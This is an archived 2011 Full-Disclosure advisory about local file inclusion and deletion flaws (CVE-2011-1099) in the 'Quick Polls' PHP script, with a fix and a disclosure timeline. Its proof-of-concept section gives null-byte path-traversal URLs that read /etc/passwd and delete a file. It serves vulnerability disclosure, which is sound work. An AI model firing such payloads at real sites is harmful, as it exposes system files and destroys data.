lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 6 Mar 2011 11:51:39 -0500
From: Mark Stanislav <mark.stanislav@...il.com>
To: full-disclosure@...ts.grok.org.uk
Cc: bugtraq@...urityfocus.com
Subject: 'Quick Polls' Local File Inclusion & Deletion Vulnerabilities (CVE-2011-1099)

'Quick Polls' Local File Inclusion & Deletion Vulnerabilities (CVE-2011-1099)
Mark Stanislav - mark.stanislav@...il.com


I. DESCRIPTION
---------------------------------------
Two vulnerabilities exist in 'Quick Polls' providing local file inclusion & local file deletion due to null-byte attacks against functions in index.php.

 
II. TESTED VERSION
---------------------------------------
1.0.1


III. PoC EXPLOITS
---------------------------------------
LFI: http://example.com/quickpolls/?fct=preview&p=../../../../../../../etc/passwd%00
LFD: http://example.com/quickpolls/?fct=delete&p=../../../../../../../tmp/foobar%00


IV. NOTES 
---------------------------------------
* magic_quotes_gpc must be disabled for null-byte attacks to work


V. SOLUTION
---------------------------------------
Upgrade to 1.0.2 or above


VI. REFERENCES
---------------------------------------
http://www.focalmedia.net/create_voting_poll.html
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1099
http://www.uncompiled.com/2011/03/quick-polls-local-file-inclusion-deletion-vulnerabilities-cve-2011-1099/


VII. TIMELINE
---------------------------------------
02/05/2011 - Initial vendor disclosure
02/07/2011 - Vendor patched and released an updated version
02/07/2011 - Confirmed public disclosure date with vendor
03/06/2011 - Public disclosure

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ